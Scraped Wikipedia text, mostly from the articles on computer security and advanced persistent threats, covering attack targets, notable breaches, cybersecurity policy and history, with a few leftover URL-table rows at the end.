Many modern passports are now biometric passports, containing an embedded microchip that stores a digitized photograph and personal information such as name, gender, and date of birth. In addition, more countries which? are introducing facial recognition technology to reduce identity-related fraud. The introduction of the ePassport has assisted border officials in verifying the identity of the passport holder, thus allowing for quick passenger processing. 121 Plans are under way in the US, the UK, and Australia to introduce SmartGate kiosks with both retina and fingerprint recognition technology. 122 The airline industry is moving from the use of traditional paper tickets towards the use of electronic tickets (e-tickets). These have been made possible by advances in online credit card transactions in partnership with the airlines. Long-distance bus companies which? are also switching over to e-ticketing transactions today. The consequences of a successful attack range from loss of confidentiality to loss of system integrity, air traffic control outages, loss of aircraft, and even loss of life. Desktop computers and laptops are commonly targeted to gather passwords or financial account information or to construct a botnet to attack another target. Smartphones, tablet computers, smart watches, and other mobile devices such as quantified self devices like activity trackers have sensors such as cameras, microphones, GPS receivers, compasses, and accelerometers which could be exploited, and may collect personal information, including sensitive health information. WiFi, Bluetooth, and cell phone networks on any of these devices could be used as attack vectors, and sensors might be remotely activated after a successful breach. 123 The increasing number of home automation devices such as the Nest thermostat are also potential targets. 123 Today many healthcare providers and health insurance companies use the internet to provide enhanced products and services, for example through use of tele-health to potentially offer better quality and access to healthcare, or fitness trackers to lower insurance premiums. The health care company Humana partners with WebMD, Oracle Corporation, EDS and Microsoft to enable its members to access their health care records, as well as to provide an overview of health care plans. 124 Patient records are increasingly being placed on secure in-house networks, alleviating the need for extra storage space. 125 Large corporations are common targets. In many cases attacks are aimed at financial gain through identity theft and involve data breaches. Examples include the loss of millions of clients' credit card and financial details by Home Depot, 126 Staples, 127 Target Corporation, 128 and Equifax. 129 Medical records have been targeted in general identify theft, health insurance fraud, and impersonating patients to obtain prescription drugs for recreational purposes or resale. 130 Although cyber threats continue to increase, 62% of all organizations did not increase security training for their business in 2015. 131 Not all attacks are financially motivated, however: security firm HBGary Federal had a serious series of attacks in 2011 from hacktivist group Anonymous in retaliation for the firm's CEO claiming to have infiltrated their group, 132 133 and Sony Pictures was hacked in 2014 with the apparent dual motive of embarrassing the company through data leaks and crippling the company by wiping workstations and servers. 134 135 Vehicles are increasingly computerized, with engine timing, cruise control, anti-lock brakes, seat belt tensioners, door locks, airbags and advanced driver-assistance systems on many models. Additionally, connected cars may use WiFi and Bluetooth to communicate with onboard consumer devices and the cell phone network. 136 Self-driving cars are expected to be even more complex. All of these systems carry some security risks, and such issues have gained wide attention. 137 138 139 Simple examples of risk include a malicious compact disc being used as an attack vector, 140 and the car's onboard microphones being used for eavesdropping. However, if access is gained to a car's internal controller area network, the danger is much greater 136 and in a widely publicized 2015 test, hackers remotely carjacked a vehicle from 10 miles away and drove it into a ditch. 141 142 Manufacturers are reacting in numerous ways, with Tesla in 2016 pushing out some security fixes over the air into its cars' computer systems. 143 In the area of autonomous vehicles, in September 2016 the United States Department of Transportation announced some initial safety standards, and called for states to come up with uniform policies. 144 145 146 Additionally, e-Drivers' licenses are being developed using the same technology. For example, Mexico's licensing authority (ICV) has used a smart card platform to issue the first e-Drivers' licenses to the city of Monterrey, in the state of Nuevo Le n. 147 Shipping companies 148 have adopted RFID (Radio Frequency Identification) technology as an efficient, digitally secure, tracking device. Unlike a barcode, RFID can be read up to 20 feet away. RFID is used by FedEx 149 and UPS. 150 Government and military computer systems are commonly attacked by activists 151 152 153 and foreign powers. 154 155 156 157 Local and regional government infrastructure such as traffic light controls, police and intelligence agency communications, personnel records, as well as student records. 158 The FBI, CIA, and Pentagon, all utilize secure controlled access technology for any of their buildings. However, the use of this form of technology is spreading into the entrepreneurial world. More and more companies are taking advantage of the development of digitally secure controlled access technology. GE's ACUVision, for example, offers a single panel platform for access control, alarm monitoring and digital recording. 159 The Internet of things (IoT) is the network of physical objects such as devices, vehicles, and buildings that are embedded with electronics, software, sensors, and network connectivity that enables them to collect and exchange data. 160 Concerns have been raised that this is being developed without appropriate consideration of the security challenges involved. 161 162 While the IoT creates opportunities for more direct integration of the physical world into computer-based systems, 163 164 it also provides opportunities for misuse. In particular, as the Internet of Things spreads widely, cyberattacks are likely to become an increasingly physical (rather than simply virtual) threat. 165 If a front door's lock is connected to the Internet, and can be locked unlocked from a phone, then a criminal could enter the home at the press of a button from a stolen or hacked phone. People could stand to lose much more than their credit card numbers in a world controlled by IoT-enabled devices. Thieves have also used electronic means to circumvent non-Internet-connected hotel door locks. 166 An attack aimed at physical infrastructure and or human lives is often called a cyber-kinetic attack. As IoT devices and appliances become more widespread, the prevalence and potential damage of cyber-kinetic attacks can increase substantially. Medical devices have either been successfully attacked or had potentially deadly vulnerabilities demonstrated, including both in-hospital diagnostic equipment 167 and implanted devices including pacemakers 168 and insulin pumps. 169 There are many reports of hospitals and hospital organizations getting hacked, including ransomware attacks, 170 171 172 173 Windows XP exploits, 174 175 viruses, 176 177 and data breaches of sensitive data stored on hospital servers. 178 171 179 180 On 28 December 2016 the US Food and Drug Administration released its recommendations for how medical device manufacturers should maintain the security of Internet-connected devices but no structure for enforcement. 181 182 In distributed generation systems, the risk of a cyber attack is real, according to Daily Energy Insider. An attack could cause a loss of power in a large area for a long period of time, and such an attack could have just as severe consequences as a natural disaster. The District of Columbia is considering creating a Distributed Energy Resources (DER) Authority within the city, with the goal being for customers to have more insight into their own energy use and giving the local electric utility, Pepco, the chance to better estimate energy demand. The D.C. proposal, however, would "allow third-party vendors to create numerous points of energy distribution, which could potentially create more opportunities for cyber attackers to threaten the electric grid. 183 Perhaps the most widely known digitally secure telecommunication device is the SIM (Subscriber Identity Module) card, a device that is embedded in most of the world's cellular devices before any service can be obtained. The SIM card is just the beginning of this digitally secure environment. The Smart Card Web Servers draft standard (SCWS) defines the interfaces to an HTTP server in a smart card. 184 Tests are being conducted to secure OTA ("over-the-air") payment and credit card information from and to a mobile phone. Combination SIM DVD devices are being developed through Smart Video Card technology which embeds a DVD-compliant optical disc into the card body of a regular SIM card. Other telecommunication developments involving digital security include mobile signatures, which use the embedded SIM card to generate a legally binding electronic signature. Serious financial damage has been caused by security breaches, but because there is no standard model for estimating the cost of an incident, the only data available is that which is made public by the organizations involved. "Several computer security consulting firms produce estimates of total worldwide losses attributable to virus and worm attacks and to hostile digital acts in general. The 2003 loss estimates by these firms range from $13 billion (worms and viruses only) to $226 billion (for all forms of covert attacks). The reliability of these estimates is often challenged; the underlying methodology is basically anecdotal. 185 However, reasonable estimates of the financial cost of security breaches can actually help organizations make rational investment decisions. According to the classic Gordon-Loeb Model analyzing the optimal investment level in information security, one can conclude that the amount a firm spends to protect information should generally be only a small fraction of the expected loss (i.e., the expected value of the loss resulting from a cyber information security breach). 186 As with physical security, the motivations for breaches of computer security vary between attackers. Some are thrill-seekers or vandals, some are activists, others are criminals looking for financial gain. State-sponsored attackers are now common and well resourced but started with amateurs such as Markus Hess who hacked for the KGB, as recounted by Clifford Stoll in The Cuckoo's Egg. Attackers motivations can vary for all types of attacks from pleasure to political goals. 15 For example, "hacktivists" may target a company or organization that carries out activities they do not agree with. This would be to create bad publicity for the company by having its website crash. High capability hackers, often with larger backing or state sponsorship, may attack based on the demands of their financial backers. These attacks are more likely to attempt more serious attack. An example of a more serious attack was the 2015 Ukraine power grid hack, which reportedly utilised the spear-phising, destruction of files, and denial-of-service attacks to carry out the full attack. 187 188 Additionally, recent attacker motivations can be traced back to extremist organizations seeking to gain political advantage or disrupt social agendas. 189 The growth of the internet, mobile technologies, and inexpensive computing devices have led to a rise in capabilities but also to the risk to environments that are deemed as vital to operations. All critical targeted environments are susceptible to compromise and this has led to a series of proactive studies on how to migrate the risk by taking into consideration motivations by these types of actors. Several stark differences exist between the hacker motivation and that of nation state actors seeking to attack based on an ideological preference. 190 A key aspect of threat modeling for any system is identifying the motivations behind potential attacks and the individuals or groups likely to carry them out. The level and detail of security measures will differ based on the specific system being protected. For instance, a home personal computer, a bank, and a classified military network each face distinct threats, despite using similar underlying technologies. 191 Computer security incident management is an organized approach to addressing and managing the aftermath of a computer security incident or compromise with the goal of preventing a breach or thwarting a cyberattack. An incident that is not identified and managed at the time of intrusion typically escalates to a more damaging event such as a data breach or system failure. The intended outcome of a computer security incident response plan is to contain the incident, limit damage and assist recovery to business as usual. Responding to compromises quickly can mitigate exploited vulnerabilities, restore services and processes and minimize losses. 192 Incident response planning allows an organization to establish a series of best practices to stop an intrusion before it causes damage. Typical incident response plans contain a set of written instructions that outline the organization's response to a cyberattack. Without a documented plan in place, an organization may not successfully detect an intrusion or compromise and stakeholders may not understand their roles, processes and procedures during an escalation, slowing the organization's response and resolution. There are four key components of a computer security incident response plan: Some illustrative examples of different types of computer security breaches are given below. In 1988, 60,000 computers were connected to the Internet, and most were mainframes, minicomputers and professional workstations. On 2 November 1988, many started to slow down, because they were running a malicious code that demanded processor time and that spread itself to other computers the first internet computer worm. 194 The software was traced back to 23 year-old Cornell University graduate student Robert Tappan Morris who said "he wanted to count how many machines were connected to the Internet". 194 In 1994, over a hundred intrusions were made by unidentified crackers into the Rome Laboratory, the US Air Force's main command and research facility. Using trojan horses, hackers were able to obtain unrestricted access to Rome's networking systems and remove traces of their activities. The intruders were able to obtain classified files, such as air tasking order systems data and furthermore able to penetrate connected networks of National Aeronautics and Space Administration's Goddard Space Flight Center, Wright-Patterson Air Force Base, some Defense contractors, and other private sector organizations, by posing as a trusted Rome center user. 195 In early 2007, American apparel and home goods company TJX announced that it was the victim of an unauthorized computer systems intrusion 196 and that the hackers had accessed a system that stored data on credit card, debit card, check, and merchandise return transactions. 197 In 2010, the computer worm known as Stuxnet reportedly ruined almost one-fifth of Iran's nuclear centrifuges. 198 It did so by disrupting industrial programmable logic controllers (PLCs) in a targeted attack. This is generally believed to have been launched by Israel and the United States to disrupt Iran's nuclear program 199 200 201 202 although neither has publicly admitted this. In early 2013, documents provided by Edward Snowden were published by The Washington Post and The Guardian 203 204 exposing the massive scale of NSA global surveillance. There were also indications that the NSA may have inserted a backdoor in a NIST standard for encryption. 205 This standard was later withdrawn due to widespread criticism. 206 The NSA additionally were revealed to have tapped the links between Google's data centers. 207 A Ukrainian hacker known as Rescator broke into Target Corporation computers in 2013, stealing roughly 40 million credit cards, 208 and then Home Depot computers in 2014, stealing between 53 and 56 million credit card numbers. 209 Warnings were delivered at both corporations, but ignored; physical security breaches using self checkout machines are believed to have played a large role. "The malware utilized is absolutely unsophisticated and uninteresting, says Jim Walter, director of threat intelligence operations at security technology company McAfee meaning that the heists could have easily been stopped by existing antivirus software had administrators responded to the warnings. The size of the thefts has resulted in major attention from state and Federal United States authorities and the investigation is ongoing. In April 2015, the Office of Personnel Management discovered it had been hacked more than a year earlier in a data breach, resulting in the theft of approximately 21.5 million personnel records handled by the office. 210 The Office of Personnel Management hack has been described by federal officials as among the largest breaches of government data in the history of the United States. 211 Data targeted in the breach included personally identifiable information such as Social Security numbers, names, dates and places of birth, addresses, and fingerprints of current and former government employees as well as anyone who had undergone a government background check. 212 213 It is believed the hack was perpetrated by Chinese hackers. 214 In July 2015, a hacker group is known as The Impact Team successfully breached the extramarital relationship website Ashley Madison, created by Avid Life Media. The group claimed that they had taken not only company data but user data as well. After the breach, The Impact Team dumped emails from the company's CEO, to prove their point, and threatened to dump customer data unless the website was taken down permanently. 215 When Avid Life Media did not take the site offline the group released two more compressed files, one 9.7GB and the second 20GB. After the second data dump, Avid Life Media CEO Noel Biderman resigned; but the website remained to function. In June 2021, the cyber attack took down the largest fuel pipeline in the U.S. and led to shortages across the East Coast. 216 International legal issues of cyber attacks are complicated in nature. There is no global base of common rules to judge, and eventually punish, cybercrimes and cybercriminals - and where security firms or agencies do locate the cybercriminal behind the creation of a particular piece of malware or form of cyber attack, often the local authorities cannot take action due to lack of laws under which to prosecute. 217 218 Proving attribution for cybercrimes and cyberattacks is also a major problem for all law enforcement agencies. "Computer viruses switch from one country to another, from one jurisdiction to another moving around the world, using the fact that we don't have the capability to globally police operations like this. So the Internet is as if someone had given free plane tickets to all the online criminals of the world. 217 The use of techniques such as dynamic DNS, fast flux and bullet proof servers add to the difficulty of investigation and enforcement. The role of the government is to make regulations to force companies and organizations to protect their systems, infrastructure and information from any cyberattacks, but also to protect its own national infrastructure such as the national power-grid. 219 The government's regulatory role in cyberspace is complicated. For some, cyberspace was seen as a virtual space that was to remain free of government intervention, as can be seen in many of today's libertarian blockchain and bitcoin discussions. 220 Many government officials and experts think that the government should do more and that there is a crucial need for improved regulation, mainly due to the failure of the private sector to solve efficiently the cybersecurity problem. R. Clarke said during a panel discussion at the RSA Security Conference in San Francisco, he believes that the "industry only responds when you threaten regulation. If the industry doesn't respond (to the threat), you have to follow through. 221 On the other hand, executives from the private sector agree that improvements are necessary, but think that government intervention would affect their ability to innovate efficiently. Daniel R. McCarthy analyzed this public-private partnership in cybersecurity and reflected on the role of cybersecurity in the broader constitution of political order. 222 On 22 May 2020, the UN Security Council held its second ever informal meeting on cybersecurity to focus on cyber challenges to international peace. According to UN Secretary-General Ant nio Guterres, new technologies are too often used to violate rights. 223 Many different teams and organizations exist, including: On 14 April 2016, the European Parliament and the Council of the European Union adopted the General Data Protection Regulation (GDPR). The GDPR, which came into force on 25 May 2018, grants individuals within the European Union (EU) and the European Economic Area (EEA) the right to the protection of personal data. The regulation requires that any entity that processes personal data incorporate data protection by design and by default. It also requires that certain organizations appoint a Data Protection Officer (DPO). Most countries have their own computer emergency response team to protect network security. Since 2010, Canada has had a cybersecurity strategy. 229 230 This functions as a counterpart document to the National Strategy and Action Plan for Critical Infrastructure. 231 The strategy has three main pillars: securing government systems, securing vital private cyber systems, and helping Canadians to be secure online. 230 231 There is also a Cyber Incident Management Framework to provide a coordinated response in the event of a cyber incident. 232 233 The Canadian Cyber Incident Response Centre (CCIRC) is responsible for mitigating and responding to threats to Canada's critical infrastructure and cyber systems. It provides support to mitigate cyber threats, technical support to respond recover from targeted cyber attacks, and provides online tools for members of Canada's critical infrastructure sectors. 234 It posts regular cybersecurity bulletins 235 operates an online reporting tool where individuals and organizations can report a cyber incident. 236 To inform the general public on how to protect themselves online, Public Safety Canada has partnered with STOP.THINK.CONNECT, a coalition of non-profit, private sector, and government organizations, 237 and launched the Cyber Security Cooperation Program. 238 239 They also run the GetCyberSafe portal for Canadian citizens, and Cyber Security Awareness Month during October. 240 Public Safety Canada aims to begin an evaluation of Canada's cybersecurity strategy in early 2015. 231 Australian federal government announced an $18.2 million investment to fortify the cybersecurity resilience of small and medium enterprises (SMEs) and enhance their capabilities in responding to cyber threats. This financial backing is an integral component of the soon-to-be-unveiled 2023 2030 Australian Cyber Security Strategy, slated for release within the current week. A substantial allocation of $7.2 million is earmarked for the establishment of a voluntary cyber health check program, facilitating businesses in conducting a comprehensive and tailored self-assessment of their cybersecurity upskill. This avant-garde health assessment serves as a diagnostic tool, enabling enterprises to ascertain the robustness of Australia's cyber security regulations. Furthermore, it affords them access to a repository of educational resources and materials, fostering the acquisition of skills necessary for an elevated cybersecurity posture. This groundbreaking initiative was jointly disclosed by Minister for Cyber Security Clare O'Neil and Minister for Small Business Julie Collins. 241 Some provisions for cybersecurity have been incorporated into rules framed under the Information Technology Act 2000. 242 The National Cyber Security Policy 2013 is a policy framework by the Ministry of Electronics and Information Technology (MeitY) which aims to protect the public and private infrastructure from cyberattacks, and safeguard "information, such as personal information (of web users), financial and banking information and sovereign data". CERT- In is the nodal agency which monitors the cyber threats in the country. The post of National Cyber Security Coordinator has also been created in the Prime Minister's Office (PMO). The Indian Companies Act 2013 has also introduced cyber law and cybersecurity obligations on the part of Indian directors. Some provisions for cybersecurity have been incorporated into rules framed under the Information Technology Act 2000 Update in 2013. 243 Following cyberattacks in the first half of 2013, when the government, news media, television stations, and bank websites were compromised, the national government committed to the training of 5,000 new cybersecurity experts by 2017. The South Korean government blamed its northern counterpart for these attacks, as well as incidents that occurred in 2009, 2011, 244 and 2012, but Pyongyang denies the accusations. 245 The United States has its first fully formed cyber plan in 15 years, as a result of the release of this National Cyber plan. 246 In this policy, the US says it will: Protect the country by keeping networks, systems, functions, and data safe; Promote American wealth by building a strong digital economy and encouraging strong domestic innovation; Peace and safety should be kept by making it easier for the US to stop people from using computer tools for bad things, working with friends and partners to do this; and increase the United States' impact around the world to support the main ideas behind an open, safe, reliable, and compatible Internet. 247 The new U.S. cyber strategy 248 seeks to allay some of those concerns by promoting responsible behavior in cyberspace, urging nations to adhere to a set of norms, both through international law and voluntary standards. It also calls for specific measures to harden U.S. government networks from attacks, like the June 2015 intrusion into the U.S. Office of Personnel Management (OPM), which compromised the records of about 4.2 million current and former government employees. And the strategy calls for the U.S. to continue to name and shame bad cyber actors, calling them out publicly for attacks when possible, along with the use of economic sanctions and diplomatic pressure. 249 The 1986 18 U.S.C. 1030, the Computer Fraud and Abuse Act is the key legislation. It prohibits unauthorized access or damage of protected computers as defined in 18 U.S.C. 1030(e)(2). Although various other measures have been proposed 250 251 none have succeeded. In 2013, executive order 13636 Improving Critical Infrastructure Cybersecurity was signed, which prompted the creation of the NIST Cybersecurity Framework. In response to the Colonial Pipeline ransomware attack 252 President Joe Biden signed Executive Order 14028 253 on May 12, 2021, to increase software security standards for sales to the government, tighten detection and security on existing systems, improve information sharing and training, establish a Cyber Safety Review Board, and improve incident response. The General Services Administration (GSA) has when? standardized the penetration test service as a pre-vetted support service, to rapidly address potential vulnerabilities, and stop adversaries before they impact US federal, state and local governments. These services are commonly referred to as Highly Adaptive Cybersecurity Services (HACS). The Department of Homeland Security has a dedicated division responsible for the response system, risk management program and requirements for cybersecurity in the United States called the National Cyber Security Division. 254 255 The division is home to US-CERT operations and the National Cyber Alert System. 255 The National Cybersecurity and Communications Integration Center brings together government organizations responsible for protecting computer networks and networked infrastructure. 256 The third priority of the FBI is to: "Protect the United States against cyber-based attacks and high-technology crimes", 257 and they, along with the National White Collar Crime Center (NW3C), and the Bureau of Justice Assistance (BJA) are part of the multi-agency task force, The Internet Crime Complaint Center, also known as IC3. 258 In addition to its own specific duties, the FBI participates alongside non-profit organizations such as InfraGard. 259 260 The Computer Crime and Intellectual Property Section (CCIPS) operates in the United States Department of Justice Criminal Division. The CCIPS is in charge of investigating computer crime and intellectual property crime and is specialized in the search and seizure of digital evidence in computers and networks. 261 In 2017, CCIPS published A Framework for a Vulnerability Disclosure Program for Online Systems to help organizations "clearly describe authorized vulnerability disclosure and discovery conduct, thereby substantially reducing the likelihood that such described activities will result in a civil or criminal violation of law under the Computer Fraud and Abuse Act (18 U.S.C. 1030). 262 The United States Cyber Command, also known as USCYBERCOM, "has the mission to direct, synchronize, and coordinate cyberspace planning and operations to defend and advance national interests in collaboration with domestic and international partners. 263 It has no role in the protection of civilian networks. 264 265 The U.S. Federal Communications Commission's role in cybersecurity is to strengthen the protection of critical communications infrastructure, to assist in maintaining the reliability of networks during disasters, to aid in swift recovery after, and to ensure that first responders have access to effective communications services. 266 The Food and Drug Administration has issued guidance for medical devices, 267 and the National Highway Traffic Safety Administration 268 is concerned with automotive cybersecurity. After being criticized by the Government Accountability Office, 269 and following successful attacks on airports and claimed attacks on airplanes, the Federal Aviation Administration has devoted funding to securing systems on board the planes of private manufacturers, and the Aircraft Communications Addressing and Reporting System. 270 Concerns have also been raised about the future Next Generation Air Transportation System. 271 The US Department of Defense (DoD) issued DoD Directive 8570 in 2004, supplemented by DoD Directive 8140, requiring all DoD employees and all DoD contract personnel involved in information assurance roles and activities to earn and maintain various industry Information Technology (IT) certifications in an effort to ensure that all DoD personnel involved in network infrastructure defense have minimum levels of IT industry recognized knowledge, skills and abilities (KSA). Andersson and Reimers (2019) report these certifications range from CompTIA's A and Security through the ICS2.org's CISSP, etc. 272 Computer emergency response team is a name given to expert groups that handle computer security incidents. In the US, two distinct organizations exist, although they do work closely together. In the context of U.S. nuclear power plants, the U.S. Nuclear Regulatory Commission (NRC) outlines cybersecurity requirements under 10 CFR Part 73, specifically in 73.54. 274 The Nuclear Energy Institute's NEI 08 09 document, Cyber Security Plan for Nuclear Power Reactors, 275 outlines a comprehensive framework for cybersecurity in the nuclear power industry. Drafted with input from the U.S. NRC, this guideline is instrumental in aiding licensees to comply with the Code of Federal Regulations (CFR), which mandates robust protection of digital computers and equipment and communications systems at nuclear power plants against cyber threats. 276 There is growing concern that cyberspace will become the next theater of warfare. As Mark Clayton from The Christian Science Monitor wrote in a 2015 article titled "The New Cyber Arms Race": In the future, wars will not just be fought by soldiers with guns or with planes that drop bombs. They will also be fought with the click of a mouse a half a world away that unleashes carefully weaponized computer programs that disrupt or destroy critical industries like utilities, transportation, communications, and energy. Such attacks could also disable military networks that control the movement of troops, the path of jet fighters, the command and control of warships. 277 This has led to new terms such as cyberwarfare and cyberterrorism. The United States Cyber Command was created in 2009 278 and many other countries have similar forces. There are a few critical voices that question whether cybersecurity is as significant a threat as it is made out to be. 279 280 281 Cybersecurity is a fast-growing field of IT concerned with reducing organizations' risk of hack or data breaches. 282 According to research from the Enterprise Strategy Group, 46% of organizations say that they have a "problematic shortage" of cybersecurity skills in 2016, up from 28% in 2015. 283 Commercial, government and non-governmental organizations all employ cybersecurity professionals. The fastest increases in demand for cybersecurity workers are in industries managing increasing volumes of consumer data such as finance, health care, and retail. 284 However, the use of the term cybersecurity is more prevalent in government job descriptions. 285 Typical cybersecurity job titles and descriptions include: 286 Student programs are also available for people interested in beginning a career in cybersecurity. 290 291 Meanwhile, a flexible and effective option for information security professionals of all experience levels to keep studying is online security training, including webcasts. 292 293 A wide range of certified courses are also available. 294 In the United Kingdom, a nationwide set of cybersecurity forums, known as the U.K Cyber Security Forum, were established supported by the Government's cybersecurity strategy 295 in order to encourage start-ups and innovation and to address the skills gap 296 identified by the U.K Government. In Singapore, the Cyber Security Agency has issued a Singapore Operational Technology (OT) Cybersecurity Competency Framework (OTCCF). The framework defines emerging cybersecurity roles in Operational Technology. The OTCCF was endorsed by the Infocomm Media Development Authority (IMDA). It outlines the different OT cybersecurity job positions as well as the technical skills and core competencies necessary. It also depicts the many career paths available, including vertical and lateral advancement opportunities. 297 The following terms used with regards to computer security are explained below: Since the Internet's arrival and with the digital transformation initiated in recent years, the notion of cybersecurity has become a familiar subject in both our professional and personal lives. Cybersecurity and cyber threats have been consistently present for the last 60 years of technological change. In the 1970s and 1980s, computer security was mainly limited to academia until the conception of the Internet, where, with increased connectivity, computer viruses and network intrusions began to take off. After the spread of viruses in the 1990s, the 2000s marked the institutionalization of organized attacks such as distributed denial of service. 301 This led to the formalization of cybersecurity as a professional discipline. 302 The April 1967 session organized by Willis Ware at the Spring Joint Computer Conference, and the later publication of the Ware Report, were foundational moments in the history of the field of computer security. 303 Ware's work straddled the intersection of material, cultural, political, and social concerns. 303 A 1977 NIST publication 304 introduced the CIA triad of confidentiality, integrity, and availability as a clear and simple way to describe key security goals. 305 While still relevant, many more elaborate frameworks have since been proposed. 306 307 However, in the 1970s and 1980s, there were no grave computer threats because computers and the internet were still developing, and security threats were easily identifiable. More often, threats came from malicious insiders who gained unauthorized access to sensitive documents and files. Although malware and network breaches existed during the early years, they did not use them for financial gain. By the second half of the 1970s, established computer firms like IBM started offering commercial access control systems and computer security software products. 308 One of the earliest examples of an attack on a computer network was the computer worm Creeper written by Bob Thomas at BBN, which propagated through the ARPANET in 1971. 309 The program was purely experimental in nature and carried no malicious payload. A later program, Reaper, was created by Ray Tomlinson in 1972 and used to destroy Creeper. citation needed Between September 1986 and June 1987, a group of German hackers performed the first documented case of cyber espionage. 310 The group hacked into American defense contractors, universities, and military base networks and sold gathered information to the Soviet KGB. The group was led by Markus Hess, who was arrested on 29 June 1987. He was convicted of espionage (along with two co-conspirators) on 15 Feb 1990. In 1988, one of the first computer worms, called the Morris worm, was distributed via the Internet. It gained significant mainstream media attention. 311 In 1993, Netscape started developing the protocol SSL, shortly after the National Center for Supercomputing Applications (NCSA) launched Mosaic 1.0, the first web browser, in 1993. citation needed 312 Netscape had SSL version 1.0 ready in 1994, but it was never released to the public due to many serious security vulnerabilities. These weaknesses included replay attacks and a vulnerability that allowed hackers to alter unencrypted communications sent by users. However, in February 1995, Netscape launched Version 2.0. 313 The National Security Agency (NSA) is responsible for the protection of U.S. information systems and also for collecting foreign intelligence. 314 The agency analyzes commonly used software and system configurations to find security flaws, which it can use for offensive purposes against competitors of the United States. 315 NSA contractors created and sold click-and-shoot attack tools to US agencies and close allies, but eventually, the tools made their way to foreign adversaries. citation needed In 2016, NSAs own hacking tools were hacked, and they have been used by Russia and North Korea. citation needed NSA's employees and contractors have been recruited at high salaries by adversaries, anxious to compete in cyberwarfare. citation needed In 2007, the United States and Israel began exploiting security flaws in the Microsoft Windows operating system to attack and damage equipment used in Iran to refine nuclear materials. Iran responded by heavily investing in their own cyberwarfare capability, which it began using against the United States. 315 |
345 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Advanced_persistent_threat | An advanced persistent threat (APT) is a stealthy threat actor, typically a state or state-sponsored group, which gains unauthorized access to a computer network and remains undetected for an extended period. 1 2 In recent times, the term may also refer to non-state-sponsored groups conducting large-scale targeted intrusions for specific goals. 3 Such threat actors' motivations are typically political or economic. 4 Every major business sector has recorded instances of cyberattacks by advanced actors with specific goals, whether to steal, spy, or disrupt. These targeted sectors include government, defense, financial services, legal services, industrial, telecoms, consumer goods and many more. 5 6 7 Some groups utilize traditional espionage vectors, including social engineering, human intelligence and infiltration to gain access to a physical location to enable network attacks. The purpose of these attacks is to install custom malware (malicious software). 8 APT attacks on mobile devices have also become a legitimate concern, since attackers are able to penetrate into cloud and mobile infrastructure to eavesdrop, steal, and tamper with data. 9 The median "dwell-time", the time an APT attack goes undetected, differs widely between regions. FireEye reported the mean dwell-time for 2018 in the Americas as 71 days, EMEA as 177 days, and APAC as 204 days. 5 Such a long dwell-time allows attackers a significant amount of time to go through the attack cycle, propagate, and achieve their objectives. Definitions of precisely what an APT is can vary, but can be summarized by their named requirements below: Warnings against targeted, socially-engineered emails dropping trojans to exfiltrate sensitive information were published by UK and US CERT organisations in 2005. This method was used throughout the early 1990s and does not in itself constitute an APT. The term "advanced persistent threat" has been cited as originating from the United States Air Force in 2006 13 with Colonel Greg Rattray cited as the individual who coined the term. 14 The Stuxnet computer worm, which targeted the computer hardware of Iran's nuclear program, is one example of an APT attack. In this case, the Iranian government might consider the Stuxnet creators to be an advanced persistent threat. citation needed 15 Within the computer security community, and increasingly within the media, the term is almost always used in reference to a long-term pattern of sophisticated computer network exploitation aimed at governments, companies, and political activists, and by extension, also to ascribe the A, P and T attributes to the groups behind these attacks. 16 Advanced persistent threat (APT) as a term may be shifting focus to computer-based hacking due to the rising number of occurrences. PC World reported an 81 percent increase from 2010 to 2011 of particularly advanced targeted computer attacks. 17 Actors in many countries have used cyberspace as a means to gather intelligence on individuals and groups of individuals of interest. 18 19 20 The United States Cyber Command is tasked with coordinating the US military's offensive and defensive cyber operations. 21 Numerous sources have alleged that some APT groups are affiliated with, or are agents of, governments of sovereign states. 22 23 24 Businesses holding a large quantity of personally identifiable information are at high risk of being targeted by advanced persistent threats, including: 25 A Bell Canada study provided deep research into the anatomy of APTs and uncovered widespread presence in Canadian government and critical infrastructure. Attribution was established to Chinese and Russian actors. 28 Actors behind advanced persistent threats create a growing and changing risk to organizations' financial assets, intellectual property, and reputation 29 by following a continuous process or kill chain: The global landscape of APT's from all sources is sometimes referred to in the singular as "the" APT, as are references to the actor behind a specific incident or series of incidents, but the definition of APT includes both actor and method. 30 In 2013, Mandiant presented results of their research on alleged Chinese attacks using APT method between 2004 and 2013 31 that followed similar lifecycle: In incidents analysed by Mandiant, the average period over which the attackers controlled the victim's network was one year, with longest almost five years. 31 The infiltrations were allegedly performed by Shanghai-based Unit 61398 of People's Liberation Army. Chinese officials have denied any involvement in these attacks. 33 Previous reports from Secdev had previously discovered and implicated Chinese actors. 34 There are tens of millions of malware variations, 35 which makes it extremely challenging to protect organizations from APT. While APT activities are stealthy and hard to detect, the command and control network traffic associated with APT can be detected at the network layer level with sophisticated methods. Deep log analyses and log correlation from various sources is of limited usefulness in detecting APT activities. It is challenging to separate noises from legitimate traffic. Traditional security technology and methods have been ineffective in detecting or mitigating APTs. 36 Active cyber defense has yielded greater efficacy in detecting and prosecuting APTs (find, fix, finish) when applying cyber threat intelligence to hunt and adversary pursuit activities. 37 38 Human-Introduced Cyber Vulnerabilities (HICV) are a weak cyber link that are neither well understood nor mitigated, constituting a significant attack vector. 39 Since Xi Jinping became General Secretary of the Chinese Communist Party in 2012, the Ministry of State Security gained more responsibility over cyberespionage vis vis the People's Liberation Army, and currently oversees various APT groups. 40 According to security researcher Timo Steffens, "the APT landscape in China is run in a 'whole country' approach, leveraging skills from universities, individual, and private and public sectors". 41 Multiple organizations may assign different names to the same actor. As separate researchers could each have their own varying assessments of an APT group, companies such as CrowdStrike, Kaspersky, Mandiant, and Microsoft, among others, have their own internal naming schemes. 77 Names between different organizations may refer to overlapping but ultimately different groups, based on various data gathered. CrowdStrike assigns animals by nation-state or other category, such as "Kitten" for Iran and "Spider" for groups focused on cybercrime. 78 Other companies have named groups based on this system — Rampant Kitten, for instance, was named by Check Point rather than CrowdStrike. 79 Dragos bases its names for APT groups on minerals. 77 Mandiant assigns numbered acronyms in three categories, APT, FIN, and UNC, resulting in APT names like FIN7. Other companies using a similar system include Proofpoint (TA) and IBM (ITG and Hive). 77 Microsoft used to assign names from the periodic table, often stylized in all-caps (e.g. POTASSIUM); in April 2023, Microsoft changed its naming schema to use weather-based names (e.g. Volt Typhoon). 80 |
346 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/w/index.php?title=Special:CreateAccount&returnto=Data+scraping | edits articles recent contributors |
347 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Special:RecentChanges | This is a list of recent changes to Wikipedia. |
